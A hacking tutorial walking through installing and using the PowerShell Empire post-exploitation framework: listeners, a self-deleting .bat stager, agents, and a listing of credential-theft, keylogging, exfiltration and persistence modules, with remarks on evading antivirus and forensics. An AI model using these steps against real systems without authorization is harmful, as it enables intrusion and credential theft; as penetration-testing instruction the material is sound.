PowerShell Empire is a post-exploitation framework for computers and servers running Microsoft Windows, Windows Server operating systems, or both. In these tutorials, we will be exploring everything from how to install Powershell Empire to how to snoop around a target's computer without the antivirus software knowing about it. If we are lucky, we might even be able to obtain domain administrator credentials and own the whole network.
Exploit frameworks are popular, and most hackers have heard of Metasploit, a framework that automates the deployment of powerful exploits. You may be asking yourself, how does PowerShell Empire differ from Metasploit? Isn't Metasploit already serving the same purpose? Well, yes and no. PowerShell Empire deals strictly with Windows machines, and it is advantageous in a penetration test because most targets these days are running some version of Windows.
A simple example of this point would be the widespread usage of excel on Microsoft Windows. Since Microsoft Excel has more advanced features than the Mac version (as well as Office 365), we can assume that the finance department of most target companies will be using Microsoft Windows. Finance departments also usually have access to bank account numbers and other juicy data!
PowerShell Empire also gives the attacker the ability to run commands in memory, which means that the malicious actions being taken by PowerShell Empire are not run on the hard drive. They are instead run in the computer's memory, which reduces the likelihood of being caught by antivirus software as well as the possibility of leaving digital fingerprints for forensics investigators.
Some of the activities and goals that can be accomplished include privilege escalation (elevating privileges from a standard user account to an administrator), network and host reconnaissance (finding out what hosts and services are present), lateral movement between hosts, and the gathering of credentials. All of these are vital components of a modern-day penetration test.
PowerShell Empire accomplishes this via three main components: listeners, stagers, and agents.
- A listener is a process that listens for a connection from the machine we are attacking. It helps Empire send the loot back to the attacker's computer.
- A stager is a snippet of code that allows our malicious code to be run via the agent on the compromised host.
- An agent is a program that maintains a connection between your computer and the compromised host.
Lastly, modules are where the fun is. These are what execute our malicious commands, which can harvest credentials and escalate our privileges, as mentioned above.
Now that we have discussed what PowerShell Empire does and why it is useful, let's take a look at how to get it up and running.
To run Powershell, you will need a Kali Linux machine. If you need a good starter Kali computer for hacking, you can check out our guide on setting one up on the low-cost Raspberry Pi below.
To install Empire on your Kali Linux machine, we need to clone it from GitHub. Open a terminal and type the following command, as shown below.
~# git clone https://github.com/EmpireProject/Empire.git Cloning into 'Empire'... remote: Enumerating objects: 12216, done. remote: Total 12216 (delta 0), reused 0 (delta 0), pack-reused 12216 Receiving objects: 100% (12216/12216), 22.14 MiB | 9.67 MiB/s, done. Resolving deltas: 100% (8307/8307), done.
~# cd Empire ~/Empire# ls changelog Dockerfile lib plugins setup data empire LICENSE README.md VERSION
You can read about Empire in the README.md file.
~/Empire# leafpad README.md # Empire ## This project is no longer supported Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at [BSidesLV in 2015](https://www.youtube.com/watch?v=Pq9t59w0mUI) and Python EmPyre premeiered at HackMiami 2016. Empire relies heavily on the work from several other projects for its underlying functionality. We have tried to call out a few of those people we've interacted with [heavily here](http://www.powershellempire.com/?page_id=2) and have included author/reference link information in the source of each Empire module as appropriate. If we have failed to improperly cite existing or prior work, please let us know. Empire is developed by [@harmj0y](https://twitter.com/harmj0y), [@sixdub](https://twitter.com/sixdub), [@enigma0x3](https://twitter.com/enigma0x3), [rvrsh3ll](https://twitter.com/424f424f), [@killswitch_gui](https://twitter.com/killswitch_gui), and [@xorrior](https://twitter.com/xorrior). Feel free to join us on Slack! https://bloodhoundgang.herokuapp.com ## Install To install, run `sudo ./setup/install.sh` script or use the corresponding docker image `docker pull empireproject/empire`. There's also a [quickstart here](http://www.powershellempire.com/?page_id=110) and full [documentation here](http://www.powershellempire.com/?page_id=83). ## Quickstart Check out the [Empire wiki](https://github.com/EmpireProject/Empire/wiki/Quickstart) for instructions on getting started with Empire. ## Contribution Rules Contributions are more than welcome! The more people who contribute to the project the better Empire will be for everyone. Below are a few guidelines for submitting contributions. * Beginning with version 2.4, we will only troubleshoot issues for Kali, Debian, or Ubuntu. All other operating systems will not be supported. We understand that this is frustrating but hopefully the new docker build can provide an alternative. * Submit pull requests to the [dev branch](https://github.com/powershellempire/Empire/tree/dev). After testing, changes will be merged to master. * Depending on what you're working on, base your module on [./lib/modules/powershell_template.py](lib/modules/powershell_template.py) or [./lib/modules/python_template.py](lib/modules/python_template.py). **Note** that for some modules you may need to massage the output to get it into a nicely displayable text format [with Out-String](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L111). * Cite previous work in the **'Comments'** module section. * If your script.ps1 logic is large, may be reused by multiple modules, or is updated often, consider implementing the logic in the appropriate **data/module_source/*** directory and [pulling the script contents into the module on tasking](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L85-L95). * Use [approved PowerShell verbs](https://technet.microsoft.com/en-us/library/ms714428(v=vs.85).aspx) for any functions. * PowerShell Version 2 compatibility is **STRONGLY** preferred. * TEST YOUR MODULE! Be sure to run it from an Empire agent before submitting a pull to ensure everything is working correctly. * For additional guidelines for your PowerShell code itself, check out the [PowerSploit style guide](https://github.com/PowerShellMafia/PowerSploit/blob/master/README.md).
You will see a "setup" folder inside the Empire directory. Navigate to that folder by typing cd setup, then use the ls command to view the contents of the "setup" folder. You can see an install shell script, as shown below.
~/Empire# cd setup ~/Empire/setup# ls cert.sh install.sh requirements.txt reset.sh setup_database.py
Type ./install.sh to install Empire by running the script. During the installation process, you will be asked to set up a server negotiation password. I set it as "toor" but you can choose your own password. If everything went well, the installation would finish, as shown below.
~/Empire/setup# ./install.sh Reading package lists... Done Building dependency tree Reading state information... Done default-jdk is already the newest version (2:1.11-72). make is already the newest version (4.2.1-1.2). make set to manually installed. python-dev is already the newest version (2.7.17-2). python-pip is already the newest version (18.1-5). The following packages were automatically installed and are no longer required: ... [>] Enter server negotiation password, enter for random generation: toor [*] Database setup completed! [*] Certificate written to ../data/empire-chain.pem [*] Private key written to ../data/empire-priv.key [*] Setup complete!
We are done with the installation. Now, it's time to start Empire.
Move back to the Empire directory by typing cd .. and run the ./empire executable as shown. It will start as seen below.
~/Empire/setup# cd .. ~/Empire# ./empire [*] Loading stagers from: /root/Empire//lib/stagers/ [*] Loading modules from: /root/Empire//lib/modules/ [*] Loading listeners from: /root/Empire//lib/listeners/
If Empire displays an error while starting, navigate to the "setup" folder with cd setup and run the ./reset.sh script. Then, restart Empire again as we did before. If that still doesn't work, you may need to install some missing modules. Here are the ones I had to install:
~/Empire# python -m pip install iptools netifaces pydispatch pydispatcher zlib_wrapper macholib xlrd xlutils pyminifier dropbox
After you start Empire, it will display a welcome message as shown below.
~/Empire# ./empire [*] Loading stagers from: /root/Empire//lib/stagers/ [*] Loading modules from: /root/Empire//lib/modules/ [*] Loading listeners from: /root/Empire//lib/listeners/ [*] Starting listener 'meterp' [+] Listener successfully started! [*] Starting listener 'http' * Serving Flask app "http" (lazy loading) * Environment: production WARNING: Do not use the development server in a production environment. Use a production WSGI server instead. * Debug mode: off [+] Listener successfully started! [*] Empire starting up... ````````` ``````.--::///+ ````-+sydmmmNNNNNNN ``./ymmNNNNNNNNNNNNNN ``-ymmNNNNNNNNNNNNNNNNN ```ommmmNNNNNNNNNNNNNNNNN ``.ydmNNNNNNNNNNNNNNNNNNNN ```odmmNNNNNNNNNNNNNNNNNNNN ```/hmmmNNNNNNNNNNNNNNNNMNNN ````+hmmmNNNNNNNNNNNNNNNNNMMN ````..ymmmNNNNNNNNNNNNNNNNNNNN ````:.+so+//:---.......----::- `````.`````````....----:///++++ ``````.-/osy+////:::---...-dNNNN ````:sdyyydy` ```:mNNNNM ````-hmmdhdmm:` ``.+hNNNNNNM ```.odNNmdmmNNo````.:+yNNNNNNNNNN ```-sNNNmdh/dNNhhdNNNNNNNNNNNNNNN ```-hNNNmNo::mNNNNNNNNNNNNNNNNNNN ```-hNNmdNo--/dNNNNNNNNNNNNNNNNNN ````:dNmmdmd-:+NNNNNNNNNNNNNNNNNNm ```/hNNmmddmd+mNNNNNNNNNNNNNNds++o ``/dNNNNNmmmmmmmNNNNNNNNNNNmdoosydd `sNNNNdyydNNNNmmmmmmNNNNNmyoymNNNNN :NNmmmdso++dNNNNmmNNNNNdhymNNNNNNNN -NmdmmNNdsyohNNNNmmNNNNNNNNNNNNNNNN `sdhmmNNNNdyhdNNNNNNNNNNNNNNNNNNNNN /yhmNNmmNNNNNNNNNNNNNNNNNNNNNNmhh `+yhmmNNNNNNNNNNNNNNNNNNNNNNmh+: `./dmmmmNNNNNNNNNNNNNNNNmmd. `ommmmmNNNNNNNmNmNNNNmmd: :dmmmmNNNNNmh../oyhhhy: `sdmmmmNNNmmh/++-.+oh. `/dmmmmmmmmdo-:/ossd: `/ohhdmmmmmmdddddmh/ `-/osyhdddddhyo: ``.----.` Welcome to the Empire
Upon completion, Empire will show the following screen.
================================================================ [Empire] Post-Exploitation Framework ================================================================ [Version] 2.5 | [Web] https://github.com/empireProject/Empire ================================================================ _______ .___ ___. .______ __ .______ _______ | ____|| \/ | | _ \ | | | _ \ | ____| | |__ | \ / | | |_) | | | | |_) | | |__ | __| | |\/| | | ___/ | | | / | __| | |____ | | | | | | | | | |\ \----.| |____ |_______||__| |__| | _| |__| | _| `._____||_______| 285 modules currently loaded 0 listeners currently active 0 agents currently active (Empire) >
As of this writing, Empire has 285 modules. Don't worry if these sound like complicated ninjitsu techniques; with diligence and practice, you will learn what modules, listeners, and agents are. By the end of this series, you will get a clear idea of what these are and how to use them.
First, let's start by typing the help command, which will display the help menu, as seen below.
(Empire) > help Commands ======== agents Jump to the Agents menu. creds Add/display credentials to/from the database. exit Exit Empire help Displays the help menu. interact Interact with a particular agent. list Lists active agents or listeners. listeners Interact with active listeners. load Loads Empire modules from a non-standard folder. plugin Load a plugin file to extend Empire. plugins List all available and active plugins. preobfuscate Preobfuscate PowerShell module_source files reload Reload one (or all) Empire modules. report Produce report CSV and log files: sessions.csv, credentials.csv, master.log reset Reset a global option (e.g. IP whitelists). resource Read and execute a list of Empire commands from a file. searchmodule Search Empire module names/descriptions. set Set a global option (e.g. IP whitelists). show Show a global option (e.g. IP whitelists). usemodule Use an Empire module. usestager Use an Empire stager.
Listeners in Empire are the channels that receive connections from our target machine. Before we do anything in Empire, we need to start the listeners. We can move to the listener management menu by typing command listeners as shown below.
(Empire) > listeners [!] No listeners currently active (Empire: listeners) > help Listener Commands ================= agents Jump to the agents menu. back Go back to the main menu. creds Display/return credentials from the database. delete Delete listener(s) from the database disable Disables (stops) one or all listeners. The listener(s) will not start automatically with Empire edit Change a listener option, will not take effect until the listener is restarted enable Enables and starts one or all listners. exit Exit Empire. help Displays the help menu. info Display information for the given active listener. kill Kill one or all active listeners. launcher Generate an initial launcher for a listener. list List all active listeners (or agents). listeners Jump to the listeners menu. main Go back to the main menu. resource Read and execute a list of Empire commands from a file. uselistener Use an Empire listener module. usestager Use an Empire stager.
Once we move to the listeners' management menu, as shown above, we can see its sub-menu by typing the help command. Let's take a look at what each command will do.
- agents - Will allow you to jump to agents menu.
- back & main – Will take you back to the main menu.
- exit – Will exit from Empire.
- help – Will display help menu as shown in the above image.
- info – Will display information about the active listener.
- kill – Will kill a particular listener.
- launcher – Used to generate an initial launcher for a listener.
- list – Will list all the active listeners.
- usestager – Used to use a stager (we will see below what exactly is a stager).
- uselistener – Used to start a listener module.
Let us now look at how to start a listener module in Empire. Type the uselistener command, and use tab-completion to see the listeners available in Empire. (If tab-completion isn't working, try enabling the feature with apt install bash-completion.)
(Empire: listeners) > uselistener dbx http_com http_hop http http_foreign meterpreter
The types of listeners available are shown above. We will learn about different types of listeners in the upcoming sections. For now, let's see how to start a listener.
Let's use the "meterpreter" listener as an example. Type uselistener meterpreter as shown above. Once the particular listener is loaded, you can type help command to display the available options.
The agents, back, exit, help, launcher, listeners, and main commands have been explained above. Let us learn about the other commands.
(Empire: listeners) > uselistener meterpreter (Empire: listeners/meterpreter) > help Listener Commands ================= agents Jump to the agents menu. back Go back a menu. creds Display/return credentials from the database. execute Execute the given listener module. exit Exit Empire. help Displays the help menu. info Display listener module options. launcher Generate an initial launcher for this listener. listeners Jump to the listeners menu. main Go back to the main menu. resource Read and execute a list of Empire commands from a file. set Set a listener option. unset Unset a listener option. (Empire: listeners/meterpreter) >
The info command shows the information about the particular type of listener we want to start, as seen below.
(Empire: listeners/meterpreter) > info Name: Meterpreter Category: client_server Authors: @harmj0y Description: Starts a 'foreign' http[s] Meterpreter listener. Meterpreter Options: Name Required Value Description ---- -------- ------- ----------- Host True http://192.168.91.138:80 Hostname/IP for staging. Name True meterpreter Name for the listener. Port True 80 Port for the listener. (Empire: listeners/meterpreter) >
Every listener requires certain options to be set. For example, the "meterpreter" listener needs the Host and Port values to be configured. The set command is used to assign these values. Similarly, the unset command is used to clear these values.
- Don't Miss: How to Use Listeners
One important thing to remember is that Empire is case sensitive. For example, in the code box below, I am setting the "Name" value of our listener. "Name" and "name" are different in Empire, and it will give you an error if they are used incorrectly, as they cannot be used interchangeably.
(Empire: listeners/meterpreter) > set [!] Error in setting listener option: list index out of range (Empire: listeners/meterpreter) > set name meterp [!] Invalid option specified. (Empire: listeners/meterpreter) > set Name meterp (Empire: listeners/meterpreter) >
When all options are set, we can start a listener using the execute command.
(Empire: listeners/meterpreter) > execute [*] Starting listener 'meterp' [+] Listener successfully started! (Empire: listeners/meterpreter) >
Once we go back to the main menu, we can see that our listener is currently active.
================================================================ [Empire] Post-Exploitation Framework ================================================================ [Version] 2.5 | [Web] https://github.com/empireProject/Empire ================================================================ _______ .___ ___. .______ __ .______ _______ | ____|| \/ | | _ \ | | | _ \ | ____| | |__ | \ / | | |_) | | | | |_) | | |__ | __| | |\/| | | ___/ | | | / | __| | |____ | | | | | | | | | |\ \----.| |____ |_______||__| |__| | _| |__| | _| `._____||_______| 285 modules currently loaded 1 listeners currently active 0 agents currently active (Empire) >
Stagers in Empire are used to set the stage for the post-exploitation activities. They are similar to payloads, which are used to create a connection back to Empire. The stagers can be accessed using the usestager command as shown below.
- Don't Miss: How to Use Payloads with Metasploit
Type the usestager and then use the tab completion to see all the available stagers.
(Empire) > usestager multi/bash osx/macho windows/launcher_bat multi/launcher osx/macro windows/launcher_lnk multi/macro osx/pkg windows/launcher_sct multi/pyinstaller osx/safari_launcher windows/launcher_vbs multi/war osx/teensy windows/launcher_xml osx/applescript windows/backdoorLnkMacro windows/macro osx/application windows/bunny windows/macroless_msword osx/ducky windows/csharp_exe windows/shellcode osx/dylib windows/dll windows/teensy osx/jar windows/ducky osx/launcher windows/hta (Empire) > usestager
We will learn about different stagers in an upcoming section. First, let's take a look at how to set up a stager.
Let's start the "launcher_bat" stager as an example.
Type the usestager windows/launcher_bat command to load the stager. Then, type the help command to have a look at the stager menu.
(Empire) > usestager windows/launcher_bat (Empire: stager/windows/launcher_bat) > help Stager Menu =========== agents Jump to the agents menu. back Go back a menu. creds Display/return credentials from the database. execute Generate/execute the given Empire stager. exit Exit Empire. generate Generate/execute the given Empire stager. help Displays the help menu. info Display stager options. interact Interact with a particular agent. list Lists all active agents (or listeners). listeners Jump to the listeners menu. main Go back to the main menu. options Display stager options. resource Read and execute a list of Empire commands from a file. set Set a stager option. unset Unset a stager option. (Empire: stager/windows/launcher_bat) >
- agents - Will allow you to jump directly to agents menu.
- back & main – Will take you back to the main menu.
- exit – Will exit from Empire.
- help- Will display help menu as shown in the above image.
- info- Will display information about the active listener.
- kill- Is used to kill a particular listener.
- execute or generate – Will execute or generate the stager.
- interact – Is used to interact with a particular agent (normally used when there are multiple listeners).
- list - Will list all the active listeners or agents.
- options- Used to see all the options we need to set for the particular agent.
- set and unset – Used to set and unset values to particular options, respectively.
- listeners - Used to jump to listeners menu.
We can get more information about this particular stager by using the info command. As you can see in the info, it creates a self-deleting batch file.
(Empire: stager/windows/launcher_bat) > info Name: BAT Launcher Description: Generates a self-deleting .bat launcher for Empire. Options: Name Required Value Description ---- -------- ------- ----------- Listener True Listener to generate stager for. OutFile False /tmp/launcher.bat File to output .bat launcher to, otherwise displayed on the screen. Obfuscate False False Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only. ObfuscateCommand False Token\All\1,Launcher\STDIN++\12467The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only. Language True powershell Language of the stager to generate. ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other). UserAgent False default User-agent string to use for the staging request (default, none, or other). Proxy False default Proxy to use for request (default, none, or other). Delete False True Switch. Delete .bat after running. StagerRetries False 0 Times for the stager to retry connecting. (Empire: stager/windows/launcher_bat) >
We need to set a listener in order for the stager to be able to communicate with Empire. In the last step, we have already created a listener. Let us set this listener for our "launcher_bat" stager.
(Empire: stager/windows/launcher_bat) > set Listener meterpreter (Empire: stager/windows/launcher_bat) > execute [*] Stager output written out to: /tmp/launcher.bat (Empire: stager/windows/launcher_bat) >
We can do this using set Listener meterp command. Type the execute command to generate the stager. The stager is created in the "tmp" folder as indicated by the output shown above in blue.
When we send the stager to our target system and the machine engages with it, we get a reverse connection back. This is known as an agent.
The Agents menu can be accessed using agents command, as shown below. But, as is stated in the output, we do not currently have any agents registered. That is just around the corner.
(Empire) > agents [!] No agents currently registered (Empire: agents) > help Commands ======== agents Jump to the agents menu. autorun Read and execute a list of Empire commands from a file and execute on each new agent "autorun <resource file> <agent language>" e.g. "autorun /root/ps.rc powershell". Or clear any autorun setting with "autorun clear" and show current autorun settings with "autorun show" back Go back to the main menu. clear Clear one or more agent's taskings. creds Display/return credentials from the database. exit Exit Empire. help Displays the help menu. interact Interact with a particular agent. kill Task one or more agents to exit. killdate Set the killdate for one or more agents (killdate [agent/all] 01/01/2016). list Lists all active agents (or listeners). listeners Jump to the listeners menu. lostlimit Task one or more agents to 'lostlimit [agent/all] [number of missed callbacks] ' main Go back to the main menu. remove Remove one or more agents from the database. rename Rename a particular agent. resource Read and execute a list of Empire commands from a file. searchmodule Search Empire module names/descriptions. sleep Task one or more agents to 'sleep [agent/all] interval [jitter]' usemodule Use an Empire PowerShell module. usestager Use an Empire stager. workinghours Set the workinghours for one or more agents (workinghours [agent/all] 9:00-17:00). (Empire: agents) >
The output of the help command is shown above. It will display all the commands we can use when an agent establishes a connection with Empire. For example, typing the list command will show all the active agents we have, as shown below.
(Empire: agents) > list [*] Active agents: Name Lang Internal IP Machine Name Username Process Delay Last Seen -------- ---- -------------- ------------- -------- ------- ----- ------------------- 7A9WSDPN ps XXXXXXXXXXXXXX XXXXXXXXXXXXX XXXXXXXX powershell/4032 5/0.0 2020-03-29 09:00:44
Modules in Empire are used to perform specific functions. We can access modules using the usemodule command. Type usemodule <Space> and then use tab completion to see all the modules.
(Empire: agents) > usemodule Display all 285 possibilities? (y or n) y exfiltration/Invoke_ExfilDataToGitHub external/generate_agent powershell/code_execution/invoke_dllinjection powershell/code_execution/invoke_metasploitpayload powershell/code_execution/invoke_ntsd powershell/code_execution/invoke_reflectivepeinjection powershell/code_execution/invoke_shellcode powershell/code_execution/invoke_shellcodemsil powershell/collection/ChromeDump powershell/collection/FoxDump powershell/collection/USBKeylogger* powershell/collection/WebcamRecorder powershell/collection/browser_data powershell/collection/clipboard_monitor powershell/collection/file_finder powershell/collection/find_interesting_file powershell/collection/get_indexed_item powershell/collection/get_sql_column_sample_data powershell/collection/get_sql_query powershell/collection/inveigh powershell/collection/keylogger powershell/collection/minidump powershell/collection/netripper powershell/collection/ninjacopy* powershell/collection/packet_capture* powershell/collection/prompt powershell/collection/screenshot powershell/collection/vaults/add_keepass_config_trigger powershell/collection/vaults/find_keepass_config powershell/collection/vaults/get_keepass_config_trigger powershell/collection/vaults/keethief powershell/collection/vaults/remove_keepass_config_trigger powershell/credentials/credential_injection* powershell/credentials/enum_cred_store powershell/credentials/invoke_kerberoast powershell/credentials/mimikatz/cache* powershell/credentials/mimikatz/certs* powershell/credentials/mimikatz/command* powershell/credentials/mimikatz/dcsync powershell/credentials/mimikatz/dcsync_hashdump powershell/credentials/mimikatz/extract_tickets powershell/credentials/mimikatz/golden_ticket powershell/credentials/mimikatz/keys* powershell/credentials/mimikatz/logonpasswords* powershell/credentials/mimikatz/lsadump* powershell/credentials/mimikatz/mimitokens* powershell/credentials/mimikatz/pth* powershell/credentials/mimikatz/purge powershell/credentials/mimikatz/sam* powershell/credentials/mimikatz/silver_ticket powershell/credentials/mimikatz/trust_keys* powershell/credentials/powerdump* powershell/credentials/sessiongopher powershell/credentials/tokens powershell/credentials/vault_credential* powershell/exfiltration/egresscheck powershell/exfiltration/exfil_dropbox powershell/exploitation/exploit_eternalblue powershell/exploitation/exploit_jboss powershell/exploitation/exploit_jenkins powershell/lateral_movement/inveigh_relay powershell/lateral_movement/invoke_dcom powershell/lateral_movement/invoke_executemsbuild powershell/lateral_movement/invoke_psexec powershell/lateral_movement/invoke_psremoting powershell/lateral_movement/invoke_smbexec powershell/lateral_movement/invoke_sqloscmd powershell/lateral_movement/invoke_sshcommand powershell/lateral_movement/invoke_wmi powershell/lateral_movement/invoke_wmi_debugger powershell/lateral_movement/jenkins_script_console powershell/lateral_movement/new_gpo_immediate_task powershell/management/disable_rdp* powershell/management/downgrade_account powershell/management/enable_multi_rdp* powershell/management/enable_rdp* powershell/management/get_domain_sid powershell/management/honeyhash* powershell/management/invoke_script powershell/management/lock powershell/management/logoff powershell/management/mailraider/disable_security powershell/management/mailraider/get_emailitems powershell/management/mailraider/get_subfolders powershell/management/mailraider/mail_search powershell/management/mailraider/search_gal powershell/management/mailraider/send_mail powershell/management/mailraider/view_email powershell/management/psinject powershell/management/reflective_inject powershell/management/restart powershell/management/runas powershell/management/shinject powershell/management/sid_to_user powershell/management/spawn powershell/management/spawnas powershell/management/switch_listener powershell/management/timestomp powershell/management/user_to_sid powershell/management/vnc powershell/management/wdigest_downgrade* powershell/management/zipfolder powershell/persistence/elevated/registry* powershell/persistence/elevated/schtasks* powershell/persistence/elevated/wmi* powershell/persistence/elevated/wmi_updater* powershell/persistence/misc/add_netuser powershell/persistence/misc/add_sid_history* powershell/persistence/misc/debugger* powershell/persistence/misc/disable_machine_acct_change* powershell/persistence/misc/get_ssps powershell/persistence/misc/install_ssp* powershell/persistence/misc/memssp* powershell/persistence/misc/skeleton_key* powershell/persistence/powerbreach/deaduser powershell/persistence/powerbreach/eventlog* powershell/persistence/powerbreach/resolver powershell/persistence/userland/backdoor_lnk powershell/persistence/userland/registry powershell/persistence/userland/schtasks powershell/privesc/ask powershell/privesc/bypassuac powershell/privesc/bypassuac_env powershell/privesc/bypassuac_eventvwr powershell/privesc/bypassuac_fodhelper powershell/privesc/bypassuac_sdctlbypass powershell/privesc/bypassuac_tokenmanipulation powershell/privesc/bypassuac_wscript powershell/privesc/getsystem* powershell/privesc/gpp powershell/privesc/mcafee_sitelist powershell/privesc/ms16-032 powershell/privesc/ms16-135 powershell/privesc/powerup/allchecks powershell/privesc/powerup/find_dllhijack powershell/privesc/powerup/service_exe_restore powershell/privesc/powerup/service_exe_stager powershell/privesc/powerup/service_exe_useradd powershell/privesc/powerup/service_stager powershell/privesc/powerup/service_useradd powershell/privesc/powerup/write_dllhijacker powershell/privesc/tater powershell/recon/find_fruit powershell/recon/get_sql_server_login_default_pw powershell/recon/http_login powershell/situational_awareness/host/antivirusproduct powershell/situational_awareness/host/computerdetails* powershell/situational_awareness/host/dnsserver powershell/situational_awareness/host/findtrusteddocuments powershell/situational_awareness/host/get_pathacl powershell/situational_awareness/host/get_proxy powershell/situational_awareness/host/get_uaclevel powershell/situational_awareness/host/monitortcpconnections powershell/situational_awareness/host/paranoia* powershell/situational_awareness/host/winenum powershell/situational_awareness/network/arpscan powershell/situational_awareness/network/bloodhound powershell/situational_awareness/network/get_exploitable_system powershell/situational_awareness/network/get_spn powershell/situational_awareness/network/get_sql_instance_domain powershell/situational_awareness/network/get_sql_server_info powershell/situational_awareness/network/portscan powershell/situational_awareness/network/powerview/find_foreign_group powershell/situational_awareness/network/powerview/find_foreign_user powershell/situational_awareness/network/powerview/find_gpo_computer_admin powershell/situational_awareness/network/powerview/find_gpo_location powershell/situational_awareness/network/powerview/find_localadmin_access powershell/situational_awareness/network/powerview/find_managed_security_group powershell/situational_awareness/network/powerview/get_cached_rdpconnection powershell/situational_awareness/network/powerview/get_computer powershell/situational_awareness/network/powerview/get_dfs_share powershell/situational_awareness/network/powerview/get_domain_controller powershell/situational_awareness/network/powerview/get_domain_policy powershell/situational_awareness/network/powerview/get_domain_trust powershell/situational_awareness/network/powerview/get_fileserver powershell/situational_awareness/network/powerview/get_forest powershell/situational_awareness/network/powerview/get_forest_domain powershell/situational_awareness/network/powerview/get_gpo powershell/situational_awareness/network/powerview/get_group powershell/situational_awareness/network/powerview/get_group_member powershell/situational_awareness/network/powerview/get_localgroup powershell/situational_awareness/network/powerview/get_loggedon powershell/situational_awareness/network/powerview/get_object_acl powershell/situational_awareness/network/powerview/get_ou powershell/situational_awareness/network/powerview/get_rdp_session powershell/situational_awareness/network/powerview/get_session powershell/situational_awareness/network/powerview/get_site powershell/situational_awareness/network/powerview/get_subnet powershell/situational_awareness/network/powerview/get_user powershell/situational_awareness/network/powerview/map_domain_trust powershell/situational_awareness/network/powerview/process_hunter powershell/situational_awareness/network/powerview/set_ad_object powershell/situational_awareness/network/powerview/share_finder powershell/situational_awareness/network/powerview/user_hunter powershell/situational_awareness/network/reverse_dns powershell/situational_awareness/network/smbautobrute powershell/situational_awareness/network/smbscanner powershell/trollsploit/get_schwifty powershell/trollsploit/message powershell/trollsploit/process_killer powershell/trollsploit/rick_ascii powershell/trollsploit/rick_astley powershell/trollsploit/thunderstruck powershell/trollsploit/voicetroll powershell/trollsploit/wallpaper powershell/trollsploit/wlmdr python/collection/linux/hashdump* python/collection/linux/keylogger python/collection/linux/mimipenguin* python/collection/linux/pillage_user python/collection/linux/sniffer* python/collection/linux/xkeylogger python/collection/osx/browser_dump python/collection/osx/clipboard python/collection/osx/hashdump* python/collection/osx/imessage_dump python/collection/osx/kerberosdump python/collection/osx/keychaindump* python/collection/osx/keychaindump_chainbreaker python/collection/osx/keychaindump_decrypt python/collection/osx/keylogger python/collection/osx/native_screenshot python/collection/osx/native_screenshot_mss python/collection/osx/osx_mic_record python/collection/osx/pillage_user python/collection/osx/prompt python/collection/osx/screensaver_alleyoop python/collection/osx/screenshot python/collection/osx/search_email python/collection/osx/sniffer* python/collection/osx/webcam python/exploit/web/jboss_jmx python/lateral_movement/multi/ssh_command python/lateral_movement/multi/ssh_launcher python/management/multi/kerberos_inject python/management/multi/socks python/management/multi/spawn python/management/osx/screen_sharing python/management/osx/shellcodeinject64* python/persistence/multi/crontab python/persistence/multi/desktopfile python/persistence/osx/CreateHijacker* python/persistence/osx/LaunchAgentUserLandPersistence python/persistence/osx/RemoveDaemon* python/persistence/osx/launchdaemonexecutable* python/persistence/osx/loginhook python/persistence/osx/mail python/privesc/linux/linux_priv_checker python/privesc/linux/unix_privesc_check python/privesc/multi/bashdoor python/privesc/multi/sudo_spawn python/privesc/osx/dyld_print_to_file python/privesc/osx/piggyback python/privesc/windows/get_gpppasswords python/situational_awareness/host/multi/SuidGuidSearch python/situational_awareness/host/multi/WorldWriteableFileSearch python/situational_awareness/host/osx/HijackScanner python/situational_awareness/host/osx/situational_awareness python/situational_awareness/network/active_directory/dscl_get_groupmembers python/situational_awareness/network/active_directory/dscl_get_groups python/situational_awareness/network/active_directory/dscl_get_users python/situational_awareness/network/active_directory/get_computers python/situational_awareness/network/active_directory/get_domaincontrollers python/situational_awareness/network/active_directory/get_fileservers python/situational_awareness/network/active_directory/get_groupmembers python/situational_awareness/network/active_directory/get_groupmemberships python/situational_awareness/network/active_directory/get_groups python/situational_awareness/network/active_directory/get_ous python/situational_awareness/network/active_directory/get_userinformation python/situational_awareness/network/active_directory/get_users python/situational_awareness/network/dcos/chronos_api_add_job python/situational_awareness/network/dcos/chronos_api_delete_job python/situational_awareness/network/dcos/chronos_api_start_job python/situational_awareness/network/dcos/etcd_crawler python/situational_awareness/network/dcos/marathon_api_create_start_app python/situational_awareness/network/dcos/marathon_api_delete_app python/situational_awareness/network/find_fruit python/situational_awareness/network/gethostbyname python/situational_awareness/network/http_rest_api python/situational_awareness/network/port_scan python/situational_awareness/network/smb_mount python/trollsploit/osx/change_background python/trollsploit/osx/login_message* python/trollsploit/osx/say python/trollsploit/osx/thunderstruck
We will learn more about different modules in a later tutorial. First, let's take a look at how to use modules in Empire. Let's use the "external/generate_agent" as an example. Type usemodule external/generate_agent to load the module. Once the required module is loaded, type help to see all the commands we can use with the module.
(Empire: agents) > usemodule external/generate_agent (Empire: external/generate_agent) > help Module Commands =============== agents Jump to the agents menu. back Go back a menu. creds Display/return credentials from the database. execute Execute the given Empire module. exit Exit Empire. help Displays the help menu. info Display module options. interact Interact with a particular agent. list Lists all active agents (or listeners). listeners Jump to the listeners menu. main Go back to the main menu. options Display module options. reload Reload the current module. resource Read and execute a list of Empire commands from a file. run Execute the given Empire module. set Set a module option. unset Unset a module option. usemodule Use an Empire PowerShell module.
- agents - Will allow you to jump directly to agents menu.
- back & main – Will take you back to the main menu
- exit – Will exit from Empire.
- help – Will display help menu as shown in the above image.
- info – Will display information about the active listener.
- kill – Is used to kill a particular listener.
- execute or run – Will execute the selected module.
- interact – Is used to interact with a particular agent (normally used when there are multiple listeners).
- list – Will list all the active listeners or agents.
- options – Is used to see all the options we need to set for the particular agent.
- set and unset – Used to set and unset values for particular options.
- listeners – Used to jump to listeners menu.
- reload – Will reload the current module.
Type the options command to see the options required for the module.
